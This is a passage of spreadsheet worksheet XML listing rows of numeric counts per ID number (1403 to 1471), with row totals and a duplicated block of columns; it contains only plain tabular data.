        <v>0</v>
      </c>
      <c r="O566" s="8">
        <v>0</v>
      </c>
      <c r="P566" s="8">
        <v>0</v>
      </c>
      <c r="Q566" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="567" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A567" s="7">
        <v>1403</v>
      </c>
      <c r="B567" s="8">
        <v>20</v>
      </c>
      <c r="C567" s="8">
        <v>0</v>
      </c>
      <c r="D567" s="8">
        <v>0</v>
      </c>
      <c r="E567" s="8">
        <v>0</v>
      </c>
      <c r="F567" s="8">
        <v>16</v>
      </c>
      <c r="G567" s="8">
        <v>1</v>
      </c>
      <c r="H567" s="8">
        <v>37</v>
      </c>
      <c r="K567" s="7">
        <v>1403</v>
      </c>
      <c r="L567" s="8">
        <v>20</v>
      </c>
      <c r="M567" s="8">
        <v>0</v>
      </c>
      <c r="N567" s="8">
        <v>0</v>
      </c>
      <c r="O567" s="8">
        <v>0</v>
      </c>
      <c r="P567" s="8">
        <v>16</v>
      </c>
      <c r="Q567" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="568" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A568" s="7">
        <v>1404</v>
      </c>
      <c r="B568" s="8">
        <v>6</v>
      </c>
      <c r="C568" s="8">
        <v>0</v>
      </c>
      <c r="D568" s="8">
        <v>23</v>
      </c>
      <c r="E568" s="8">
        <v>5</v>
      </c>
      <c r="F568" s="8">
        <v>2</v>
      </c>
      <c r="G568" s="8">
        <v>2</v>
      </c>
      <c r="H568" s="8">
        <v>38</v>
      </c>
      <c r="K568" s="7">
        <v>1404</v>
      </c>
      <c r="L568" s="8">
        <v>6</v>
      </c>
      <c r="M568" s="8">
        <v>0</v>
      </c>
      <c r="N568" s="8">
        <v>23</v>
      </c>
      <c r="O568" s="8">
        <v>5</v>
      </c>
      <c r="P568" s="8">
        <v>2</v>
      </c>
      <c r="Q568" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="569" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A569" s="7">
        <v>1405</v>
      </c>
      <c r="B569" s="8">
        <v>25</v>
      </c>
      <c r="C569" s="8">
        <v>0</v>
      </c>
      <c r="D569" s="8">
        <v>10</v>
      </c>
      <c r="E569" s="8">
        <v>40</v>
      </c>
      <c r="F569" s="8">
        <v>0</v>
      </c>
      <c r="G569" s="8">
        <v>5</v>
      </c>
      <c r="H569" s="8">
        <v>80</v>
      </c>
      <c r="K569" s="7">
        <v>1405</v>
      </c>
      <c r="L569" s="8">
        <v>25</v>
      </c>
      <c r="M569" s="8">
        <v>0</v>
      </c>
      <c r="N569" s="8">
        <v>10</v>
      </c>
      <c r="O569" s="8">
        <v>40</v>
      </c>
      <c r="P569" s="8">
        <v>0</v>
      </c>
      <c r="Q569" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="570" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A570" s="7">
        <v>1406</v>
      </c>
      <c r="B570" s="8">
        <v>25</v>
      </c>
      <c r="C570" s="8">
        <v>2</v>
      </c>
      <c r="D570" s="8">
        <v>5</v>
      </c>
      <c r="E570" s="8">
        <v>5</v>
      </c>
      <c r="F570" s="8">
        <v>16</v>
      </c>
      <c r="G570" s="8">
        <v>21</v>
      </c>
      <c r="H570" s="8">
        <v>74</v>
      </c>
      <c r="K570" s="7">
        <v>1406</v>
      </c>
      <c r="L570" s="8">
        <v>25</v>
      </c>
      <c r="M570" s="8">
        <v>2</v>
      </c>
      <c r="N570" s="8">
        <v>5</v>
      </c>
      <c r="O570" s="8">
        <v>5</v>
      </c>
      <c r="P570" s="8">
        <v>16</v>
      </c>
      <c r="Q570" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="571" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A571" s="7">
        <v>1407</v>
      </c>
      <c r="B571" s="8">
        <v>26</v>
      </c>
      <c r="C571" s="8">
        <v>2</v>
      </c>
      <c r="D571" s="8">
        <v>0</v>
      </c>
      <c r="E571" s="8">
        <v>0</v>
      </c>
      <c r="F571" s="8">
        <v>41</v>
      </c>
      <c r="G571" s="8">
        <v>7</v>
      </c>
      <c r="H571" s="8">
        <v>76</v>
      </c>
      <c r="K571" s="7">
        <v>1407</v>
      </c>
      <c r="L571" s="8">
        <v>26</v>
      </c>
      <c r="M571" s="8">
        <v>2</v>
      </c>
      <c r="N571" s="8">
        <v>0</v>
      </c>
      <c r="O571" s="8">
        <v>0</v>
      </c>
      <c r="P571" s="8">
        <v>41</v>
      </c>
      <c r="Q571" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="572" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A572" s="7">
        <v>1408</v>
      </c>
      <c r="B572" s="8">
        <v>20</v>
      </c>
      <c r="C572" s="8">
        <v>1</v>
      </c>
      <c r="D572" s="8">
        <v>20</v>
      </c>
      <c r="E572" s="8">
        <v>0</v>
      </c>
      <c r="F572" s="8">
        <v>20</v>
      </c>
      <c r="G572" s="8">
        <v>40</v>
      </c>
      <c r="H572" s="8">
        <v>101</v>
      </c>
      <c r="K572" s="7">
        <v>1408</v>
      </c>
      <c r="L572" s="8">
        <v>20</v>
      </c>
      <c r="M572" s="8">
        <v>1</v>
      </c>
      <c r="N572" s="8">
        <v>20</v>
      </c>
      <c r="O572" s="8">
        <v>0</v>
      </c>
      <c r="P572" s="8">
        <v>20</v>
      </c>
      <c r="Q572" s="8">
        <v>40</v>
      </c>
    </row>
    <row r="573" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A573" s="7">
        <v>1413</v>
      </c>
      <c r="B573" s="8">
        <v>25</v>
      </c>
      <c r="C573" s="8">
        <v>1</v>
      </c>
      <c r="D573" s="8">
        <v>11</v>
      </c>
      <c r="E573" s="8">
        <v>0</v>
      </c>
      <c r="F573" s="8">
        <v>3</v>
      </c>
      <c r="G573" s="8">
        <v>1</v>
      </c>
      <c r="H573" s="8">
        <v>41</v>
      </c>
      <c r="K573" s="7">
        <v>1413</v>
      </c>
      <c r="L573" s="8">
        <v>25</v>
      </c>
      <c r="M573" s="8">
        <v>1</v>
      </c>
      <c r="N573" s="8">
        <v>11</v>
      </c>
      <c r="O573" s="8">
        <v>0</v>
      </c>
      <c r="P573" s="8">
        <v>3</v>
      </c>
      <c r="Q573" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="574" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A574" s="7">
        <v>1414</v>
      </c>
      <c r="B574" s="8">
        <v>24</v>
      </c>
      <c r="C574" s="8">
        <v>1</v>
      </c>
      <c r="D574" s="8">
        <v>9</v>
      </c>
      <c r="E574" s="8">
        <v>0</v>
      </c>
      <c r="F574" s="8">
        <v>3</v>
      </c>
      <c r="G574" s="8">
        <v>3</v>
      </c>
      <c r="H574" s="8">
        <v>40</v>
      </c>
      <c r="K574" s="7">
        <v>1414</v>
      </c>
      <c r="L574" s="8">
        <v>24</v>
      </c>
      <c r="M574" s="8">
        <v>1</v>
      </c>
      <c r="N574" s="8">
        <v>9</v>
      </c>
      <c r="O574" s="8">
        <v>0</v>
      </c>
      <c r="P574" s="8">
        <v>3</v>
      </c>
      <c r="Q574" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="575" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A575" s="7">
        <v>1417</v>
      </c>
      <c r="B575" s="8">
        <v>26</v>
      </c>
      <c r="C575" s="8">
        <v>1</v>
      </c>
      <c r="D575" s="8">
        <v>45</v>
      </c>
      <c r="E575" s="8">
        <v>65</v>
      </c>
      <c r="F575" s="8">
        <v>28</v>
      </c>
      <c r="G575" s="8">
        <v>38</v>
      </c>
      <c r="H575" s="8">
        <v>203</v>
      </c>
      <c r="K575" s="7">
        <v>1417</v>
      </c>
      <c r="L575" s="8">
        <v>26</v>
      </c>
      <c r="M575" s="8">
        <v>1</v>
      </c>
      <c r="N575" s="8">
        <v>45</v>
      </c>
      <c r="O575" s="8">
        <v>65</v>
      </c>
      <c r="P575" s="8">
        <v>28</v>
      </c>
      <c r="Q575" s="8">
        <v>38</v>
      </c>
    </row>
    <row r="576" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A576" s="7">
        <v>1418</v>
      </c>
      <c r="B576" s="8">
        <v>30</v>
      </c>
      <c r="C576" s="8">
        <v>3</v>
      </c>
      <c r="D576" s="8">
        <v>105</v>
      </c>
      <c r="E576" s="8">
        <v>2</v>
      </c>
      <c r="F576" s="8">
        <v>10</v>
      </c>
      <c r="G576" s="8">
        <v>5</v>
      </c>
      <c r="H576" s="8">
        <v>155</v>
      </c>
      <c r="K576" s="7">
        <v>1418</v>
      </c>
      <c r="L576" s="8">
        <v>30</v>
      </c>
      <c r="M576" s="8">
        <v>3</v>
      </c>
      <c r="N576" s="8">
        <v>105</v>
      </c>
      <c r="O576" s="8">
        <v>2</v>
      </c>
      <c r="P576" s="8">
        <v>10</v>
      </c>
      <c r="Q576" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="577" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A577" s="7">
        <v>1424</v>
      </c>
      <c r="B577" s="8">
        <v>15</v>
      </c>
      <c r="C577" s="8">
        <v>0</v>
      </c>
      <c r="D577" s="8">
        <v>5</v>
      </c>
      <c r="E577" s="8">
        <v>0</v>
      </c>
      <c r="F577" s="8">
        <v>1</v>
      </c>
      <c r="G577" s="8">
        <v>1</v>
      </c>
      <c r="H577" s="8">
        <v>22</v>
      </c>
      <c r="K577" s="7">
        <v>1424</v>
      </c>
      <c r="L577" s="8">
        <v>15</v>
      </c>
      <c r="M577" s="8">
        <v>0</v>
      </c>
      <c r="N577" s="8">
        <v>5</v>
      </c>
      <c r="O577" s="8">
        <v>0</v>
      </c>
      <c r="P577" s="8">
        <v>1</v>
      </c>
      <c r="Q577" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="578" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A578" s="7">
        <v>1430</v>
      </c>
      <c r="B578" s="8">
        <v>24</v>
      </c>
      <c r="C578" s="8">
        <v>24</v>
      </c>
      <c r="D578" s="8">
        <v>140</v>
      </c>
      <c r="E578" s="8">
        <v>0</v>
      </c>
      <c r="F578" s="8">
        <v>285</v>
      </c>
      <c r="G578" s="8">
        <v>1</v>
      </c>
      <c r="H578" s="8">
        <v>474</v>
      </c>
      <c r="K578" s="7">
        <v>1430</v>
      </c>
      <c r="L578" s="8">
        <v>24</v>
      </c>
      <c r="M578" s="8">
        <v>24</v>
      </c>
      <c r="N578" s="8">
        <v>140</v>
      </c>
      <c r="O578" s="8">
        <v>0</v>
      </c>
      <c r="P578" s="8">
        <v>285</v>
      </c>
      <c r="Q578" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="579" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A579" s="7">
        <v>1434</v>
      </c>
      <c r="B579" s="8">
        <v>20</v>
      </c>
      <c r="C579" s="8">
        <v>1</v>
      </c>
      <c r="D579" s="8">
        <v>15</v>
      </c>
      <c r="E579" s="8">
        <v>0</v>
      </c>
      <c r="F579" s="8">
        <v>6</v>
      </c>
      <c r="G579" s="8">
        <v>6</v>
      </c>
      <c r="H579" s="8">
        <v>48</v>
      </c>
      <c r="K579" s="7">
        <v>1434</v>
      </c>
      <c r="L579" s="8">
        <v>20</v>
      </c>
      <c r="M579" s="8">
        <v>1</v>
      </c>
      <c r="N579" s="8">
        <v>15</v>
      </c>
      <c r="O579" s="8">
        <v>0</v>
      </c>
      <c r="P579" s="8">
        <v>6</v>
      </c>
      <c r="Q579" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="580" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A580" s="7">
        <v>1435</v>
      </c>
      <c r="B580" s="8">
        <v>26</v>
      </c>
      <c r="C580" s="8">
        <v>3</v>
      </c>
      <c r="D580" s="8">
        <v>0</v>
      </c>
      <c r="E580" s="8">
        <v>0</v>
      </c>
      <c r="F580" s="8">
        <v>140</v>
      </c>
      <c r="G580" s="8">
        <v>190</v>
      </c>
      <c r="H580" s="8">
        <v>359</v>
      </c>
      <c r="K580" s="7">
        <v>1435</v>
      </c>
      <c r="L580" s="8">
        <v>26</v>
      </c>
      <c r="M580" s="8">
        <v>3</v>
      </c>
      <c r="N580" s="8">
        <v>0</v>
      </c>
      <c r="O580" s="8">
        <v>0</v>
      </c>
      <c r="P580" s="8">
        <v>140</v>
      </c>
      <c r="Q580" s="8">
        <v>190</v>
      </c>
    </row>
    <row r="581" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A581" s="7">
        <v>1437</v>
      </c>
      <c r="B581" s="8">
        <v>25</v>
      </c>
      <c r="C581" s="8">
        <v>0</v>
      </c>
      <c r="D581" s="8">
        <v>0</v>
      </c>
      <c r="E581" s="8">
        <v>0</v>
      </c>
      <c r="F581" s="8">
        <v>4</v>
      </c>
      <c r="G581" s="8">
        <v>7</v>
      </c>
      <c r="H581" s="8">
        <v>36</v>
      </c>
      <c r="K581" s="7">
        <v>1437</v>
      </c>
      <c r="L581" s="8">
        <v>25</v>
      </c>
      <c r="M581" s="8">
        <v>0</v>
      </c>
      <c r="N581" s="8">
        <v>0</v>
      </c>
      <c r="O581" s="8">
        <v>0</v>
      </c>
      <c r="P581" s="8">
        <v>4</v>
      </c>
      <c r="Q581" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="582" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A582" s="7">
        <v>1443</v>
      </c>
      <c r="B582" s="8">
        <v>25</v>
      </c>
      <c r="C582" s="8">
        <v>2</v>
      </c>
      <c r="D582" s="8">
        <v>12</v>
      </c>
      <c r="E582" s="8">
        <v>10</v>
      </c>
      <c r="F582" s="8">
        <v>2</v>
      </c>
      <c r="G582" s="8">
        <v>2</v>
      </c>
      <c r="H582" s="8">
        <v>53</v>
      </c>
      <c r="K582" s="7">
        <v>1443</v>
      </c>
      <c r="L582" s="8">
        <v>25</v>
      </c>
      <c r="M582" s="8">
        <v>2</v>
      </c>
      <c r="N582" s="8">
        <v>12</v>
      </c>
      <c r="O582" s="8">
        <v>10</v>
      </c>
      <c r="P582" s="8">
        <v>2</v>
      </c>
      <c r="Q582" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="583" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A583" s="7">
        <v>1445</v>
      </c>
      <c r="B583" s="8">
        <v>0</v>
      </c>
      <c r="C583" s="8">
        <v>0</v>
      </c>
      <c r="D583" s="8">
        <v>4</v>
      </c>
      <c r="E583" s="8">
        <v>0</v>
      </c>
      <c r="F583" s="8">
        <v>7</v>
      </c>
      <c r="G583" s="8">
        <v>1</v>
      </c>
      <c r="H583" s="8">
        <v>12</v>
      </c>
      <c r="K583" s="7">
        <v>1445</v>
      </c>
      <c r="L583" s="8">
        <v>0</v>
      </c>
      <c r="M583" s="8">
        <v>0</v>
      </c>
      <c r="N583" s="8">
        <v>4</v>
      </c>
      <c r="O583" s="8">
        <v>0</v>
      </c>
      <c r="P583" s="8">
        <v>7</v>
      </c>
      <c r="Q583" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="584" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A584" s="7">
        <v>1446</v>
      </c>
      <c r="B584" s="8">
        <v>5</v>
      </c>
      <c r="C584" s="8">
        <v>1</v>
      </c>
      <c r="D584" s="8">
        <v>0</v>
      </c>
      <c r="E584" s="8">
        <v>0</v>
      </c>
      <c r="F584" s="8">
        <v>2</v>
      </c>
      <c r="G584" s="8">
        <v>1</v>
      </c>
      <c r="H584" s="8">
        <v>9</v>
      </c>
      <c r="K584" s="7">
        <v>1446</v>
      </c>
      <c r="L584" s="8">
        <v>5</v>
      </c>
      <c r="M584" s="8">
        <v>1</v>
      </c>
      <c r="N584" s="8">
        <v>0</v>
      </c>
      <c r="O584" s="8">
        <v>0</v>
      </c>
      <c r="P584" s="8">
        <v>2</v>
      </c>
      <c r="Q584" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="585" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A585" s="7">
        <v>1447</v>
      </c>
      <c r="B585" s="8">
        <v>25</v>
      </c>
      <c r="C585" s="8">
        <v>1</v>
      </c>
      <c r="D585" s="8">
        <v>5</v>
      </c>
      <c r="E585" s="8">
        <v>30</v>
      </c>
      <c r="F585" s="8">
        <v>2</v>
      </c>
      <c r="G585" s="8">
        <v>6</v>
      </c>
      <c r="H585" s="8">
        <v>69</v>
      </c>
      <c r="K585" s="7">
        <v>1447</v>
      </c>
      <c r="L585" s="8">
        <v>25</v>
      </c>
      <c r="M585" s="8">
        <v>1</v>
      </c>
      <c r="N585" s="8">
        <v>5</v>
      </c>
      <c r="O585" s="8">
        <v>30</v>
      </c>
      <c r="P585" s="8">
        <v>2</v>
      </c>
      <c r="Q585" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="586" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A586" s="7">
        <v>1448</v>
      </c>
      <c r="B586" s="8">
        <v>2</v>
      </c>
      <c r="C586" s="8">
        <v>0</v>
      </c>
      <c r="D586" s="8">
        <v>1</v>
      </c>
      <c r="E586" s="8">
        <v>0</v>
      </c>
      <c r="F586" s="8">
        <v>1</v>
      </c>
      <c r="G586" s="8">
        <v>1</v>
      </c>
      <c r="H586" s="8">
        <v>5</v>
      </c>
      <c r="K586" s="7">
        <v>1448</v>
      </c>
      <c r="L586" s="8">
        <v>2</v>
      </c>
      <c r="M586" s="8">
        <v>0</v>
      </c>
      <c r="N586" s="8">
        <v>1</v>
      </c>
      <c r="O586" s="8">
        <v>0</v>
      </c>
      <c r="P586" s="8">
        <v>1</v>
      </c>
      <c r="Q586" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="587" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A587" s="7">
        <v>1449</v>
      </c>
      <c r="B587" s="8">
        <v>25</v>
      </c>
      <c r="C587" s="8">
        <v>1</v>
      </c>
      <c r="D587" s="8">
        <v>2</v>
      </c>
      <c r="E587" s="8">
        <v>2</v>
      </c>
      <c r="F587" s="8">
        <v>1</v>
      </c>
      <c r="G587" s="8">
        <v>1</v>
      </c>
      <c r="H587" s="8">
        <v>32</v>
      </c>
      <c r="K587" s="7">
        <v>1449</v>
      </c>
      <c r="L587" s="8">
        <v>25</v>
      </c>
      <c r="M587" s="8">
        <v>1</v>
      </c>
      <c r="N587" s="8">
        <v>2</v>
      </c>
      <c r="O587" s="8">
        <v>2</v>
      </c>
      <c r="P587" s="8">
        <v>1</v>
      </c>
      <c r="Q587" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="588" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A588" s="7">
        <v>1451</v>
      </c>
      <c r="B588" s="8">
        <v>26</v>
      </c>
      <c r="C588" s="8">
        <v>0</v>
      </c>
      <c r="D588" s="8">
        <v>2</v>
      </c>
      <c r="E588" s="8">
        <v>5</v>
      </c>
      <c r="F588" s="8">
        <v>0</v>
      </c>
      <c r="G588" s="8">
        <v>1</v>
      </c>
      <c r="H588" s="8">
        <v>34</v>
      </c>
      <c r="K588" s="7">
        <v>1451</v>
      </c>
      <c r="L588" s="8">
        <v>26</v>
      </c>
      <c r="M588" s="8">
        <v>0</v>
      </c>
      <c r="N588" s="8">
        <v>2</v>
      </c>
      <c r="O588" s="8">
        <v>5</v>
      </c>
      <c r="P588" s="8">
        <v>0</v>
      </c>
      <c r="Q588" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="589" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A589" s="7">
        <v>1452</v>
      </c>
      <c r="B589" s="8">
        <v>25</v>
      </c>
      <c r="C589" s="8">
        <v>1</v>
      </c>
      <c r="D589" s="8">
        <v>2</v>
      </c>
      <c r="E589" s="8">
        <v>5</v>
      </c>
      <c r="F589" s="8">
        <v>2</v>
      </c>
      <c r="G589" s="8">
        <v>0</v>
      </c>
      <c r="H589" s="8">
        <v>35</v>
      </c>
      <c r="K589" s="7">
        <v>1452</v>
      </c>
      <c r="L589" s="8">
        <v>25</v>
      </c>
      <c r="M589" s="8">
        <v>1</v>
      </c>
      <c r="N589" s="8">
        <v>2</v>
      </c>
      <c r="O589" s="8">
        <v>5</v>
      </c>
      <c r="P589" s="8">
        <v>2</v>
      </c>
      <c r="Q589" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="590" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A590" s="7">
        <v>1453</v>
      </c>
      <c r="B590" s="8">
        <v>25</v>
      </c>
      <c r="C590" s="8">
        <v>1</v>
      </c>
      <c r="D590" s="8">
        <v>8</v>
      </c>
      <c r="E590" s="8">
        <v>13</v>
      </c>
      <c r="F590" s="8">
        <v>2</v>
      </c>
      <c r="G590" s="8">
        <v>2</v>
      </c>
      <c r="H590" s="8">
        <v>51</v>
      </c>
      <c r="K590" s="7">
        <v>1453</v>
      </c>
      <c r="L590" s="8">
        <v>25</v>
      </c>
      <c r="M590" s="8">
        <v>1</v>
      </c>
      <c r="N590" s="8">
        <v>8</v>
      </c>
      <c r="O590" s="8">
        <v>13</v>
      </c>
      <c r="P590" s="8">
        <v>2</v>
      </c>
      <c r="Q590" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="591" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A591" s="7">
        <v>1454</v>
      </c>
      <c r="B591" s="8">
        <v>0</v>
      </c>
      <c r="C591" s="8">
        <v>0</v>
      </c>
      <c r="D591" s="8">
        <v>0</v>
      </c>
      <c r="E591" s="8">
        <v>0</v>
      </c>
      <c r="F591" s="8">
        <v>17</v>
      </c>
      <c r="G591" s="8">
        <v>2</v>
      </c>
      <c r="H591" s="8">
        <v>19</v>
      </c>
      <c r="K591" s="7">
        <v>1454</v>
      </c>
      <c r="L591" s="8">
        <v>0</v>
      </c>
      <c r="M591" s="8">
        <v>0</v>
      </c>
      <c r="N591" s="8">
        <v>0</v>
      </c>
      <c r="O591" s="8">
        <v>0</v>
      </c>
      <c r="P591" s="8">
        <v>17</v>
      </c>
      <c r="Q591" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="592" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A592" s="7">
        <v>1455</v>
      </c>
      <c r="B592" s="8">
        <v>6</v>
      </c>
      <c r="C592" s="8">
        <v>1</v>
      </c>
      <c r="D592" s="8">
        <v>40</v>
      </c>
      <c r="E592" s="8">
        <v>39</v>
      </c>
      <c r="F592" s="8">
        <v>5</v>
      </c>
      <c r="G592" s="8">
        <v>4</v>
      </c>
      <c r="H592" s="8">
        <v>95</v>
      </c>
      <c r="K592" s="7">
        <v>1455</v>
      </c>
      <c r="L592" s="8">
        <v>6</v>
      </c>
      <c r="M592" s="8">
        <v>1</v>
      </c>
      <c r="N592" s="8">
        <v>40</v>
      </c>
      <c r="O592" s="8">
        <v>39</v>
      </c>
      <c r="P592" s="8">
        <v>5</v>
      </c>
      <c r="Q592" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="593" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A593" s="7">
        <v>1459</v>
      </c>
      <c r="B593" s="8">
        <v>20</v>
      </c>
      <c r="C593" s="8">
        <v>0</v>
      </c>
      <c r="D593" s="8">
        <v>8</v>
      </c>
      <c r="E593" s="8">
        <v>1</v>
      </c>
      <c r="F593" s="8">
        <v>8</v>
      </c>
      <c r="G593" s="8">
        <v>1</v>
      </c>
      <c r="H593" s="8">
        <v>38</v>
      </c>
      <c r="K593" s="7">
        <v>1459</v>
      </c>
      <c r="L593" s="8">
        <v>20</v>
      </c>
      <c r="M593" s="8">
        <v>0</v>
      </c>
      <c r="N593" s="8">
        <v>8</v>
      </c>
      <c r="O593" s="8">
        <v>1</v>
      </c>
      <c r="P593" s="8">
        <v>8</v>
      </c>
      <c r="Q593" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="594" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A594" s="7">
        <v>1462</v>
      </c>
      <c r="B594" s="8">
        <v>0</v>
      </c>
      <c r="C594" s="8">
        <v>0</v>
      </c>
      <c r="D594" s="8">
        <v>0</v>
      </c>
      <c r="E594" s="8">
        <v>0</v>
      </c>
      <c r="F594" s="8">
        <v>9</v>
      </c>
      <c r="G594" s="8">
        <v>1</v>
      </c>
      <c r="H594" s="8">
        <v>10</v>
      </c>
      <c r="K594" s="7">
        <v>1462</v>
      </c>
      <c r="L594" s="8">
        <v>0</v>
      </c>
      <c r="M594" s="8">
        <v>0</v>
      </c>
      <c r="N594" s="8">
        <v>0</v>
      </c>
      <c r="O594" s="8">
        <v>0</v>
      </c>
      <c r="P594" s="8">
        <v>9</v>
      </c>
      <c r="Q594" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="595" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A595" s="7">
        <v>1463</v>
      </c>
      <c r="B595" s="8">
        <v>6</v>
      </c>
      <c r="C595" s="8">
        <v>1</v>
      </c>
      <c r="D595" s="8">
        <v>14</v>
      </c>
      <c r="E595" s="8">
        <v>6</v>
      </c>
      <c r="F595" s="8">
        <v>10</v>
      </c>
      <c r="G595" s="8">
        <v>5</v>
      </c>
      <c r="H595" s="8">
        <v>42</v>
      </c>
      <c r="K595" s="7">
        <v>1463</v>
      </c>
      <c r="L595" s="8">
        <v>6</v>
      </c>
      <c r="M595" s="8">
        <v>1</v>
      </c>
      <c r="N595" s="8">
        <v>14</v>
      </c>
      <c r="O595" s="8">
        <v>6</v>
      </c>
      <c r="P595" s="8">
        <v>10</v>
      </c>
      <c r="Q595" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="596" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A596" s="7">
        <v>1465</v>
      </c>
      <c r="B596" s="8">
        <v>25</v>
      </c>
      <c r="C596" s="8">
        <v>2</v>
      </c>
      <c r="D596" s="8">
        <v>0</v>
      </c>
      <c r="E596" s="8">
        <v>0</v>
      </c>
      <c r="F596" s="8">
        <v>64</v>
      </c>
      <c r="G596" s="8">
        <v>1</v>
      </c>
      <c r="H596" s="8">
        <v>92</v>
      </c>
      <c r="K596" s="7">
        <v>1465</v>
      </c>
      <c r="L596" s="8">
        <v>25</v>
      </c>
      <c r="M596" s="8">
        <v>2</v>
      </c>
      <c r="N596" s="8">
        <v>0</v>
      </c>
      <c r="O596" s="8">
        <v>0</v>
      </c>
      <c r="P596" s="8">
        <v>64</v>
      </c>
      <c r="Q596" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="597" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A597" s="7">
        <v>1468</v>
      </c>
      <c r="B597" s="8">
        <v>26</v>
      </c>
      <c r="C597" s="8">
        <v>3</v>
      </c>
      <c r="D597" s="8">
        <v>5</v>
      </c>
      <c r="E597" s="8">
        <v>0</v>
      </c>
      <c r="F597" s="8">
        <v>151</v>
      </c>
      <c r="G597" s="8">
        <v>16</v>
      </c>
      <c r="H597" s="8">
        <v>201</v>
      </c>
      <c r="K597" s="7">
        <v>1468</v>
      </c>
      <c r="L597" s="8">
        <v>26</v>
      </c>
      <c r="M597" s="8">
        <v>3</v>
      </c>
      <c r="N597" s="8">
        <v>5</v>
      </c>
      <c r="O597" s="8">
        <v>0</v>
      </c>
      <c r="P597" s="8">
        <v>151</v>
      </c>
      <c r="Q597" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="598" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A598" s="7">
        <v>1469</v>
      </c>
      <c r="B598" s="8">
        <v>24</v>
      </c>
      <c r="C598" s="8">
        <v>0</v>
      </c>
      <c r="D598" s="8">
        <v>4</v>
      </c>
      <c r="E598" s="8">
        <v>0</v>
      </c>
      <c r="F598" s="8">
        <v>4</v>
      </c>
      <c r="G598" s="8">
        <v>3</v>
      </c>
      <c r="H598" s="8">
        <v>35</v>
      </c>
      <c r="K598" s="7">
        <v>1469</v>
      </c>
      <c r="L598" s="8">
        <v>24</v>
      </c>
      <c r="M598" s="8">
        <v>0</v>
      </c>
      <c r="N598" s="8">
        <v>4</v>
      </c>
      <c r="O598" s="8">
        <v>0</v>
      </c>
      <c r="P598" s="8">
        <v>4</v>
      </c>
      <c r="Q598" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="599" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A599" s="7">
        <v>1470</v>
      </c>
      <c r="B599" s="8">
        <v>0</v>
      </c>
      <c r="C599" s="8">
        <v>0</v>
      </c>
      <c r="D599" s="8">
        <v>2</v>
      </c>
      <c r="E599" s="8">
        <v>4</v>
      </c>
      <c r="F599" s="8">
        <v>2</v>
      </c>
      <c r="G599" s="8">
        <v>7</v>
      </c>
      <c r="H599" s="8">
        <v>15</v>
      </c>
      <c r="K599" s="7">
        <v>1470</v>
      </c>
      <c r="L599" s="8">
        <v>0</v>
      </c>
      <c r="M599" s="8">
        <v>0</v>
      </c>
      <c r="N599" s="8">
        <v>2</v>
      </c>
      <c r="O599" s="8">
        <v>4</v>
      </c>
      <c r="P599" s="8">
        <v>2</v>
      </c>
      <c r="Q599" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="600" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A600" s="7">
        <v>1471</v>
      </c>
      <c r="B600" s="8">
        <v>26</v>
      </c>
      <c r="C600" s="8">
        <v>1</v>
      </c>
      <c r="D600" s="8">
        <v>4</v>
      </c>
      <c r="E600" s="8">
        <v>0</v>
      </c>
      <c r="F600" s="8">
        <v>5</v>
      </c>
      <c r="G600" s="8">
        <v>1</v>
      </c>
      <c r="H600" s="8">
        <v>37</v>
      </c>
      <c r="K600" s="7">
        <v>1471</v>
      </c>
